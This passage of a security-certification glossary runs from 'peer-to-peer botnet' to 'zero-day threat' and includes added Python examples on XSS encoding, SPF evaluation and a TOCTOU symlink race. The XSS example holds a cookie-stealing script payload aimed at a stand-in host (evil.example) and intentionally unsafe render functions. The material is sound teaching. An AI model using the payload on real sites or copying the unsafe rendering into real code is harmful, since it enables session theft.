peer-to-peer botnet A botnet in which devices that can be reached externally are compromised and run server software that turns them into command and control servers for the devices that are recruited internally that cannot communicate with the command and control server operating externally.

Perl A scripting language found on all Linux servers. It helps in text manipulation tasks.

permissions Access rights granted or denied at the file, folder, or other object level.

persistent XSS An XSS attack in which the hacker stores the user input on the target server, such as in a database, in a message forum, a visitor log, a comment field, and so forth, and then a victim is able to retrieve the stored data from the web application without that data being made safe to render in the browser. Also called stored XSS.

personal health information (PHI) The medical records of individuals; also referred to as protected health information.

Personal Information Protection and Electronic Documents Act (PIPEDA) Affects how private-sector organizations collect, use, and disclose personal information in the course of commercial business in Canada.

personally identifiable information (PII) Any piece of data that can be used alone or with other information to identify a single person.

phishing A social engineering attack in which attackers try to learn personal information, including credit card information and financial data.

physical control A type of control that is implemented to protect an organization’s facilities and personnel.

ping sweep Uses ICMP to identify all live hosts by pinging all IP addresses in the known network.

piping The process of sending the output of one function to another function as its input.

Platform as a Service (PaaS) Cloud service model in which the vendor provides the hardware platform or data center and the software running on the platform, including the operating systems and infrastructure software.

Point-to-Point Tunneling Protocol (PPTP) Microsoft protocol based on PPP that uses built-in Microsoft Point-to-Point encryption and can use a number of authentication methods, including CHAP, MS-CHAP, and EAP-TLS.

policy decision point (PDP) An entity that retrieves all applicable polices in XACML and compares the request with the policies.

policy enforcement point (PEP) An entity that protects the resource that the subject (a user or an application) is attempting to access in XACML.

port scan A scan that attempts to connect to every port on each device and report which ports are open, or “listening.”

port security Allows you to keep a port enabled for legitimate devices while preventing its use by illegitimate devices.

preventive control A type of control that prevents an attack from occurring.

privacy Relates to rights to control the sharing and use of one’s personal information.

private cloud A cloud deployment model in which a private organization implements a cloud in its internal enterprise, and that cloud is used by the organization’s employees and partners.

Process Explorer A Sysinternals tool that shows running processes in a parent/child tree together with their handles, loaded DLLs, and resource usage, giving far more detail than Task Manager; for example, its activity graph lets you identify which process caused past CPU spikes, which is not possible with Task Manager alone.

processor security extensions A set of security-related instruction codes that are built into some modern central processing units (CPUs).

programmable logic controllers (PLCs) Industrial control system (ICS) components that read sensor inputs, execute control logic, and drive actuators; unlike RTUs, they do not include telemetry hardware.

proprietary systems Systems or solutions developed by a vendor or by the organization itself that do not follow open standards.

proprietary/closed-source intelligence Intelligence sources that are available to only a select audience.

protocol analysis Analysis that examines information in the header of a packet.

Prowler A tool that creates reports that list gaps found between the best practices of AWS as stated in CIS Amazon Web Services Foundations Benchmark 1.1.

proximity reader A door control that reads a proximity card from a short distance and is used to control access to a sensitive room.

proxy Any device or application that acts as an intermediary for requests from clients seeking resources.

public cloud A cloud deployment model in which a service provider makes resources available to the public over the Internet.

public key infrastructure (PKI) A collection of systems, software, and communication protocols that distribute, manage, and control public key cryptography.

purging A data destruction technique that makes the data unreadable even with advanced forensic techniques.

push notification services Allow unsolicited messages to be sent by an application to a mobile device even when the application is not open on the device.

Python A scripting language that supports procedure-oriented programming and object-oriented programming.

Q

qualitative risk analysis Risk analysis that does not assign monetary and numeric values to all facets of the risk analysis process.

Qualys A cloud-based vulnerability scanner.

quantitative risk analysis Risk analysis that assigns monetary and numeric values to all facets of the risk analysis process, including asset value, threat frequency, vulnerability severity, impact, and safeguard costs.

query writing Search functions that help to locate the relevant information in log data.

R

race condition A flaw in which the outcome depends on the timing or ordering of operations; an attacker exploits it by acting in the window between two steps (for example, between a check and the use of its result), thereby altering the intended sequence of events and the outcome.

radio frequency identification (RFID) Object-tracking technology that uses radio frequency chips and readers to manage inventory.

ransomware A type of malware that prevents or limits users from accessing their systems. It is called ransomware because it forces its victims to pay a ransom through certain online payment methods.

real user monitoring (RUM) A monitoring method that captures and analyzes every transaction of every application or website user.

real-time operating system (RTOS) A system designed to process data as it comes in, typically without buffer delays.

Reaver Both a package of tools called Reaver and a tool within the package called Reaver that is used to attack Wi-Fi Protected Setup (WPS).

recoverability The ability of a function or system to be recovered in the event of a disaster or disruptive event.

recovery point objective (RPO) The point in time to which the disrupted resource or function must be restored; in effect, the maximum acceptable amount of data loss, measured in time.

recovery time objective (RTO) The shortest time period after a disaster or disruptive event within which a resource or function must be restored in order to avoid unacceptable consequences.

red team A group of technicians who act as the attacking force during testing.

reflective XSS XSS attack in which a web application immediately returns user input in an error message or search result, without that data being made safe to render in the browser, and without permanently storing the user provided data.
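
The following is an added example (not part of the original glossary) that ties the output encoding, persistent XSS, and reflective XSS entries together. It is constructed: a search page that echoes the query (reflective), a comment list backed by a stand-in store (persistent), and the same pages with output encoding applied. The attacker payload, page fragments, and the `CommentStore` class are assumptions for illustration, not any framework’s API.

```python
import html

# Constructed attacker input. Rendered raw in an HTML body it would run in the victim's browser.
PAYLOAD = '<script>document.location="http://evil.example/?c="+document.cookie</script>'


def search_page_unsafe(query: str) -> str:
    """Reflective XSS: the query is echoed straight back into the HTML body."""
    return f"<p>No results for: {query}</p>"


def search_page_safe(query: str) -> str:
    """Same page with output encoding for the HTML body context."""
    return f"<p>No results for: {html.escape(query)}</p>"


class CommentStore:
    """Stand-in for the database behind a comment form (persistent/stored XSS).
    Note that input is stored as-is; the defense is applied where the data is rendered."""

    def __init__(self):
        self._comments = []

    def add(self, text: str) -> None:
        self._comments.append(text)

    def render_unsafe(self) -> str:
        return "<ul>" + "".join(f"<li>{c}</li>" for c in self._comments) + "</ul>"

    def render_safe(self) -> str:
        return "<ul>" + "".join(f"<li>{html.escape(c)}</li>" for c in self._comments) + "</ul>"


def profile_link_safe(name: str) -> str:
    """Attribute context: the encoder must also neutralize quotes, or a payload such as
    '" onmouseover="alert(1)' breaks out of the attribute. html.escape(quote=True) does this."""
    return f'<a href="/profile?name={html.escape(name, quote=True)}">profile</a>'


def contains_live_script(rendered: str) -> bool:
    """Crude check used only to show the difference: is a raw <script> tag present?"""
    return "<script>" in rendered


if __name__ == "__main__":
    print("reflected, unsafe:", contains_live_script(search_page_unsafe(PAYLOAD)))
    print("reflected, safe:  ", contains_live_script(search_page_safe(PAYLOAD)))
    store = CommentStore()
    store.add(PAYLOAD)
    print("stored, unsafe:   ", contains_live_script(store.render_unsafe()))
    print("stored, safe:     ", contains_live_script(store.render_safe()))
    print(profile_link_safe('" onmouseover="alert(1)'))
```

The encoding is the same in both attacks; what differs is only where the attacker’s string comes from (the current request versus the database). Encoding is chosen per output context: the body encoder is not sufficient for an attribute, a URL, or a JavaScript string.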

registration authority (RA) The entity in a PKI that verifies the requestor’s identity and registers the requestor.

relevancy A description of the applicability of the data to a particular threat.

remote code execution A category of attack in which the hacker is able to make a target system execute code of the attacker’s choosing from a remote location, which could be anywhere in the world.

remote terminal units (RTUs) Industrial control system (ICS) components that connect to the sensors and convert sensor data to digital data, including telemetry hardware.

remote wipe Instructions sent remotely to a mobile device that erase all the data, typically used when a device is lost or stolen.

Representational State Transfer (REST) A client/server model for interacting with content on remote systems, typically using HTTP.

Responder A tool that answers (poisons) NBT-NS and LLMNR name requests so that victims send authentication material, such as NTLMv2 hashes, to the attacker.

responsive control A type of control that is implemented after an event; also called a recovery control.

reverse engineering The process of taking something apart to discover how it works and perhaps to replicate it; retracing the steps in an incident, as seen from the logs.

RFID See radio frequency identification (RFID).

rights Manage who is allowed to perform certain operations on an entire computer or within a domain, rather than a particular object within a computer.

risk acceptance Understanding and accepting the level of risk as well as the cost of damages that can occur.

risk assessment A tool used in risk management to identify vulnerabilities and threats, assess the impact of those vulnerabilities and threats, and determine which controls to implement.

risk assessment matrix A table used to assess risks qualitatively.

risk avoidance Terminating an activity that causes a risk or choosing an alternative that is not as risky.

risk management A formal process that rates identified vulnerabilities by the likelihood of their compromise and the impact of said compromise.

risk mitigation Defining the acceptable risk level the organization can tolerate and reducing the risk to that level.

risk transfer Passing on the risk to a third party, such as an insurance company.

rogue access point An unauthorized AP connected to the organization’s wireless network that the organization does not control and manage.

rogue device Device present in the environment that you do not control.

role-based access control (RBAC) An access control model in which users are organized by job role into security groups, which are then granted the rights and permissions required to perform that job.

rooting or jailbreaking Attaining root privileges on a smartphone.

rootkit A set of tools that a hacker installs on a computer after she has managed to gain access and elevate her privileges to administrator, in order to hide her presence and maintain privileged access.

Roots of Trust (RoTs) The hardware, firmware, or software components that are inherently trusted and form the foundation of assurance of the trustworthiness of a device, including mobile devices.

Ruby A scripting language that is great for web development.

runtime data integrity check The process that ensures the integrity of the peripheral memory contents during runtime execution.

runtime debugging The process of using a programming tool to not only identify syntactic problems in code but also discover weaknesses that can lead to memory leaks and buffer overflows.

S

SABSA An enterprise security architecture framework that uses the six communication questions (What, Where, When, Why, Who, and How) that intersect with six layers (operational, component, physical, logical, conceptual, and contextual).

sanitization The process of removing data from storage media so that it cannot be recovered, by clearing (overwriting), purging, or destroying the media.

Sarbanes-Oxley Act (SOX) Also known as the Public Company Accounting Reform and Investor Protection Act of 2002, affects any organization that is publicly traded in the United States. It controls the accounting methods and financial reporting for the organizations and stipulates penalties and even jail time for executive officers.

scope The areas to be included in a scan; determines the impact and is a function of how widespread the incident is.

ScoutSuite An open source multi-cloud security auditing tool that collects configuration data through the cloud providers’ APIs and produces a report highlighting risky settings in the cloud environment.

screened host firewall A firewall that is between the final router and the internal network.

screened subnet Architecture where two firewalls are used, and traffic must be inspected at both firewalls before it can enter the internal network.

scripting Using scripting languages to automate a process.

Secure Boot A UEFI feature that requires each boot component (boot loader, OS kernel, drivers) to carry a digital signature that chains to a key in the firmware’s trusted database before it is allowed to execute.

secure enclave An isolated, hardware-backed execution environment (for example, a coprocessor with its own CPU and memory) that keeps keys and other sensitive operations protected even when the main operating system kernel is compromised.

Secure European System for Applications in a Multi-vendor Environment (SESAME) A project that extended Kerberos’s functionality to fix Kerberos’s weaknesses. Uses both symmetric and asymmetric cryptography to protect interchanged data and uses a trusted authentication server at each host.

secure processing A concept that uses a variety of technologies to prevent the processing of sensitive information or alternately to prevent any insecure actions on the part of the CPU or processor.

Secure Shell (SSH) An application protocol that is used to remotely log in to another computer using a secure tunnel.

secured memory A region of memory within a partition that is designated as security sensitive and protected from other code.

Security Assertions Markup Language (SAML) A security attestation model built on XML and SOAP-based services that allows for the exchange of authentication and authorization data between systems and supports federated identity management.

Security Content Automation Protocol (SCAP) A standard that the security automation community uses to enumerate software flaws and configuration issues.

security engineering The process of architecting security features into the design of a system or set of systems.

security information and event management (SIEM) A type of system that provides an automated solution for analyzing security events and data and deciding where the attention needs to be given.

security regression testing A subset of regression testing that validates that changes have not reduced the security of the application or opened new weaknesses.

segmentation Involves limiting the scope of an incident by leveraging existing segments of the network as barriers to prevent the spread to other segments.

Sender Policy Framework (SPF) An e-mail validation system that works by using DNS to determine whether an e-mail sent by someone has been sent by a host sanctioned by that domain’s administrator.
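
The following is an added example (not from the original glossary) of how an SPF record is evaluated against the IP address of the connecting mail server. It is a constructed, simplified evaluator: it supports the `ip4`, `ip6`, and `all` mechanisms with their `+`, `-`, `~`, and `?` qualifiers, which is enough to show the decision logic. Mechanisms that require DNS lookups (`include`, `a`, `mx`) are deliberately not implemented here (an assumption so the example runs offline); a real receiver fetches the record from the sending domain’s TXT record and resolves those too.

```python
import ipaddress

QUALIFIERS = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}


def evaluate_spf(record: str, sender_ip: str) -> str:
    """Return the SPF result ('pass', 'fail', 'softfail', 'neutral', or 'none')
    for a connecting IP, given the text of the domain's SPF record.

    Mechanisms are tested left to right; the first match decides, and its
    qualifier (default '+') supplies the result. 'all' matches everything, so
    '-all' at the end means 'anything not listed above is unauthorized'."""
    terms = record.split()
    if not terms or terms[0].lower() != "v=spf1":
        return "none"                      # no usable SPF record

    ip = ipaddress.ip_address(sender_ip)
    for term in terms[1:]:
        qualifier = "+"
        if term[0] in QUALIFIERS:
            qualifier, term = term[0], term[1:]

        if term.lower() == "all":
            return QUALIFIERS[qualifier]

        mechanism, _, value = term.partition(":")
        if mechanism.lower() in ("ip4", "ip6"):
            network = ipaddress.ip_network(value, strict=False)
            if ip.version == network.version and ip in network:
                return QUALIFIERS[qualifier]
        else:
            # include/a/mx/exists need DNS; not supported in this offline example.
            raise NotImplementedError(f"mechanism '{mechanism}' requires DNS resolution")

    return "neutral"                       # no mechanism matched and no 'all' given


if __name__ == "__main__":
    # Constructed record for a hypothetical domain: two authorized ranges, everything else fails.
    record = "v=spf1 ip4:192.0.2.0/24 ip4:198.51.100.10 -all"
    for ip in ("192.0.2.55", "198.51.100.10", "203.0.113.1"):
        print(f"{ip:<15} -> {evaluate_spf(record, ip)}")
```

The practical caveat this shows is the difference between `-all` and `~all`: a record ending in `~all` only soft-fails unlisted senders, so a receiver that treats softfail leniently will still accept spoofed mail from that domain.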

sensitive personal information (SPI) Refers to information that does not identify an individual, but is related to an individual and communicates information that is private or could potentially harm an individual should it be made public.

sensitivity A measure of how freely data can be handled.

service-level agreement (SLA) A document that specifies a service to be provided by a party, the costs of the service, and the expectations of performance.

Service Provisioning Markup Language (SPML) An XML-based framework developed by the Organization for the Advancement of Structured Information Standards (OASIS) for exchanging user, resource, and service provisioning information between cooperating organizations.

service-oriented architecture (SOA) An architecture that operates on the theory of providing web-based communication functionality without each application requiring redundant code to be written per application.

session hijacking An attack that attempts to place the hacker in the middle of an active conversation between two computers for the purpose of taking over the session of one of the two systems, thus receiving all data sent to that system.

Shibboleth An open source project that provides single sign-on (SSO) capabilities and allows sites to make informed authorization decisions for individual access of protected online resources in a privacy-preserving manner.

Simple Certificate Enrollment Protocol (SCEP) Protocol for provisioning certificates to network devices, including mobile devices.

Simple Object Access Protocol (SOAP) Protocol specification for exchanging structured information in the implementation of web services in computer networks.

single loss expectancy (SLE) The monetary impact of each threat occurrence. Calculated as the asset value (AV) times the exposure factor (EF).

single sign-on (SSO) An environment in which a user enters his login credentials once and can access all resources in the network.

sinkhole A router designed to accept and analyze attack traffic that can be used to draw traffic away from a target, to monitor worm traffic, or to monitor other malicious traffic.

site accreditation Evaluates the application or system at a specific self-contained location.

SOC 1, Type 1 report A Service Organization Control report that gives the auditor’s opinion on the suitability of the design of the service organization’s controls relevant to its customers’ financial reporting, as of a specific point in time.

SOC 1, Type 2 report A Service Organization Control report that includes the Type 1 content plus an audit of the operating effectiveness of those controls over a period of time.

Software as a Service (SaaS) A cloud service model in which the vendor provides the entire solution, including the operating system, the infrastructure software, and the application.

software defined networking (SDN) The decoupling of the control plane and data plane in networking by locating the logic of routers and switches into a central controller and locating simple data forwarding in the physical devices.

software development life cycle (SDLC) Provides a predictable framework of procedures designed to identify all requirements with regard to functionality, cost, reliability, and delivery schedule and ensure that each is met in the final solution.

spyware/adware Tracks your Internet usage in an attempt to tailor ads and junk e-mail to your interests.

SSL/TLS Secure Sockets Layer/Transport Layer Security encryption option for creating VPNs. It works at the application layer of the OSI model. It is used mainly to protect HTTP traffic or web servers.

standard word password A type of password that consists of single words that often include a mixture of upper- and lowercase letters.

static analysis Software analysis that is conducted without the software running.

static code analysis Code analysis that is conducted without the code executing.

static password A type of password that provides a minimum level of security because the password never changes.

Sticky MAC A feature that allows a switch to learn the MAC addresses of the devices currently connected to the port and convert them to secure MAC addresses (the only MAC addresses allowed to send on the port).

strcpy A C standard library function (also available in C++) that copies the C string pointed to by the source into the array pointed to by the destination, including the terminating null character (and stopping at that point). A function that has a reputation for issues: because it never checks the size of the destination, if the destination is not long enough to contain the string, a buffer overrun occurs.

stream-based cipher A type of cipher that performs encryption on a bit-by-bit basis and uses keystream generators.

stress testing A type of testing that determines the workload that an application can withstand.

string search A search technique that is used to look within a log file or data stream and locate any instances of that string.

Structured Query Language (SQL) injection An attack that inserts, or “injects,” a SQL query as the input data from the client to the application.

Structured Threat Information eXpression (STIX) A structured language (XML-based in STIX 1.x, JSON-based in STIX 2.x) for describing and sharing cyber threat intelligence in a machine-readable form among those using the language.

supervisory control and data acquisition (SCADA) A system operating with coded signals over communication channels so as to provide control of remote equipment.

supplicant In 802.1X, the user or device requesting access to the network.

symmetric algorithm A type of algorithm that uses a single private or secret key for both encryption and decryption; the same key is shared by the two parties and must remain secret between them.

SYN flood An attack in which the attacker sends a large number of TCP SYN packets (often from spoofed source addresses) and never completes the handshake, so the target’s table of half-open connections fills with entries waiting for the final ACK and legitimate connections are refused.

synthetic transaction monitoring A type of proactive monitoring that uses external agents to run scripted transactions against an application.

Sysinternals A suite of more than 70 Windows utilities (both graphical and command-line) that can be used for both troubleshooting and security issues.

Syslog A protocol that can be used to collect logs from devices and store them in a central location called a Syslog server.

system accreditation Evaluates an application or support system.

system assessment A process whereby systems are fully vetted for potential issues from both a functionality and security standpoint.

system hardening A process that ensures that all systems have been hardened to the extent that is possible and still provide functionality.

system isolation Isolating systems through the control of communications with the device.

System-on-Chip (SoC) An integrated circuit (also known as a “chip”) that integrates all components of a computer or other electronic system.

T

tabletop exercise An informal brainstorming session that encourages participation from business leaders and other key employees.

tcpdump A command-line tool that can capture packets on Linux and Unix platforms.

technical control A type of control, usually a software or hardware component, that is used to restrict access.

telemetry system An industrial control system (ICS) component that connects RTUs and PLCs to control centers and the enterprise.

The Open Group Architecture Framework (TOGAF) An enterprise architecture framework that helps organizations design, plan, implement, and govern an enterprise information architecture.

threat actor An attacker who takes advantage of a security loophole.

threat feed A constantly updating stream of indicators or artifacts derived from a source outside the organization.

threat intelligence The process of gathering and analyzing threat information to produce actionable knowledge about adversaries and their methods.

threat model A conceptual design that attempts to provide a framework on which to implement security efforts.

threat modeling methodology A formal process that enables organizations to identify threats and potential attacks and implement the appropriate mitigations against these threats and attacks.

timeliness A description of how recent the data is.

time-of-check/time-of-use (TOCTOU) A race-condition attack in which the attacker changes a resource between the moment the system checks it (for example, a permission or path check) and the moment the system uses it, so that the check no longer applies to what is actually used.
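
The following is an added example (not from the original glossary) that illustrates both the race condition entry and the time-of-check/time-of-use entry with a file-system race on a POSIX system. It is constructed: a hypothetical `between_check_and_use` hook stands in for the attacker winning the race, and the file names and contents are sample data. The vulnerable function checks that a path is not a symbolic link and then opens the path by name, leaving a window in which the file can be swapped for a symlink to a secret; the hardened function has the kernel enforce the same rule inside the `open()` call with `O_NOFOLLOW`, so there is no window at all.

```python
import os
import tempfile


def read_if_not_symlink(path: str, between_check_and_use=None) -> bytes:
    """VULNERABLE (TOCTOU): the check and the use are two separate operations on a name."""
    if os.path.islink(path):                 # time of check
        raise PermissionError("symlinks are refused")
    if between_check_and_use:
        between_check_and_use()              # the race window; the attacker acts here
    with open(path, "rb") as fh:             # time of use: the name is resolved again
        return fh.read()


def read_nofollow(path: str, between_check_and_use=None) -> bytes:
    """Hardened: the 'no symlink' rule is enforced atomically by the open() syscall."""
    if between_check_and_use:
        between_check_and_use()              # the attacker may swap the file whenever they like
    fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW)   # fails with ELOOP on a symlink
    with os.fdopen(fd, "rb") as fh:
        return fh.read()


def demo():
    """Run both versions against an attacker who always wins the race.
    Returns (bytes leaked by the vulnerable version, whether the hardened version refused)."""
    with tempfile.TemporaryDirectory() as workdir:
        public = os.path.join(workdir, "public.txt")
        secret = os.path.join(workdir, "secret.txt")
        with open(secret, "wb") as fh:
            fh.write(b"secret")

        def reset_public():
            if os.path.lexists(public):
                os.remove(public)
            with open(public, "wb") as fh:
                fh.write(b"public")

        def attacker_swaps_file():
            os.remove(public)
            os.symlink(secret, public)       # public.txt now points at the secret

        reset_public()
        leaked = read_if_not_symlink(public, attacker_swaps_file)

        reset_public()
        try:
            read_nofollow(public, attacker_swaps_file)
            blocked = False
        except OSError:
            blocked = True
        return leaked, blocked


if __name__ == "__main__":
    leaked, blocked = demo()
    print("vulnerable version returned:", leaked)
    print("hardened version refused:   ", blocked)
```

The general lesson is that a check on a name cannot be trusted at a later use of the same name; operate on a file descriptor once opened, or use flags that make the kernel perform the check and the use as one step.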

tokenization A form of data hiding or masking in that it replaces a value with a token that is used instead of the actual value.

total attack surface Comprises all of the points at which vulnerabilities exist. It is critical that the organization have a clear understanding of the total attack surface.

trade secret Intellectual property protection that ensures that proprietary technical or business information remains confidential. A trade secret gives an organization a competitive edge. Trade secrets include recipes, formulas, ingredient listings, and so on.

trademark Intellectual property protection that ensures that a symbol, a sound, or an expression that identifies a product or an organization is protected from being used by another organization.

traditional botnet A type of botnet in which all the zombies communicate directly with the command and control server, which is located outside the network.

trend analysis Analysis that focuses on the long-term direction in the increase or decrease in a particular type of traffic or in a particular behavior in the network.

Trojan horse A program or rogue application that appears to or is purported to do one thing but actually does another when executed.

true negative Occurs when a scanner correctly determines that a vulnerability does not exist.

true positive Occurs when a scanner correctly identifies a vulnerability.

Trusted Automated eXchange of Indicator Information (TAXII) An application protocol for exchanging cyber threat intelligence (CTI) over HTTPS.

trusted execution A collection of features that are used to verify the integrity of the system and implement security policies, which together can be used to enhance the trust level of the complete system.

Trusted Foundry program A program that can help you exercise care in ensuring the authenticity and integrity of the components of hardware purchased from a vendor.

Trusted Platform Module (TPM) A security chip installed on a computer’s motherboard that is responsible for protecting symmetric and asymmetric keys, hashes, and digital certificates.

Type 1 hypervisor Virtualization software that is installed on hardware directly, which is why it is commonly called a bare metal hypervisor. A guest operating system runs on another level above the hypervisor. Examples include Citrix XenServer, Microsoft Hyper-V, and VMware vSphere.

Type 2 hypervisor A hypervisor installed over an existing operating system. Examples include VMware Workstation and Oracle VM VirtualBox.

type accreditation Evaluates an application or system that is distributed to a number of different locations.

U

U.S. Digital Millennium Copyright Act Imposes criminal penalties on those who make available technologies whose primary purpose is to circumvent content protection technologies.

uncredentialed scan A scan in which the scanner lacks administrative privileges on the device it is scanning.

Unified Extensible Firmware Interface (UEFI) An open standard interface layer between the firmware and the operating system that requires firmware updates to be digitally signed.

United States Federal Sentencing Guidelines of 1991 Provides guidelines to prevent sentencing disparities that existed across the United States.

unknown threats Threats of which we are not aware.

USA PATRIOT Act Affects law enforcement and intelligence agencies in the United States. Its purpose is to enhance the investigatory tools that law enforcement can use, including e-mail communications, telephone records, Internet communications, medical records, and financial records.

USB On-The-Go (USB OTG) A specification first used in late 2001 that allows USB devices, such as tablets or smartphones, to act as either a USB host or a USB device.

user acceptance testing Testing designed to ensure that security features do not make an application unusable from the user perspective.

user and entity behavior analytics (UEBA) A type of cybersecurity analysis that focuses on normal user activities and detects anomalous behavior when there are deviations from the norm.

user-mode debugger A debugger that has access to only the user-mode space of the operating system.

V

Victim Corner of the Diamond model that describes a single victim or multiple victims.

virtual desktop infrastructure (VDI) An infrastructure that hosts desktop operating systems within a virtual environment on a centralized server.

virtual local-area network (VLAN) A logical subdivision of a switch that segregates ports from one another as if they were in different LANs.

virtual private cloud (VPC) A cloud model in which a public cloud provider isolates a specific portion of its public cloud infrastructure to be provisioned for private use.

virtual private network (VPN) A connection that allows external devices to access an internal network by creating an encrypted tunnel over the Internet.

virtual SAN A software-defined storage method that allows pooling of storage capabilities and instant and automatic provisioning of virtual machine storage.

virtual TPM A software object that performs the functions of a TPM chip.

virus A self-replicating program that infects software.

VM escape An attack that occurs when a guest OS escapes from its VM encapsulation to interact directly with the hypervisor.

vulnerability feed An RSS feed dedicated to the sharing of information about the latest vulnerabilities.

vulnerability management The process of identification and mitigation of vulnerabilities.

vulnerability scan A type of scan that locates vulnerabilities in systems.

W

web application firewall (WAF) A firewall that applies rule sets to an HTTP conversation. These rule sets cover common attack types to which these session types are susceptible. Among the common attacks they address are cross-site scripting and SQL injection.

web vulnerability scanner A type of scanner used to assess the security of web applications.

white team A group of technicians that referees the encounter between the red team and the blue team during testing.

whitelisting The process of identifying, and permitting as known-good senders, a list of acceptable e-mail addresses, Internet addresses, websites, applications, or some other identifier.

wireless intrusion prevention system (WIPS) A system that not only alerts you when an unknown device (AP or station) is in the area but can also take a number of actions in response.

wireless key logger A key logger that collects information and transmits it to the criminal via Bluetooth or Wi-Fi.

Wireshark One of the most widely used network packet sniffers.

work product retention Work done for and owned by the organization.

work recovery time (WRT) The difference between the maximum tolerable downtime (MTD) and the recovery time objective (RTO); that is, the time remaining after the RTO has elapsed before the MTD is reached.

workflow orchestration Sequencing of events based on certain parameters by using scripting and scripting tools.

worm A type of malware that can spread without the assistance of the user.

X–Z

XMAS scan A type of scan that sets the FIN, PSH, and URG flags.

ZAP An interception proxy produced by the Open Web Application Security Project (OWASP).

zero-day threat A threat that has no known solution yet.
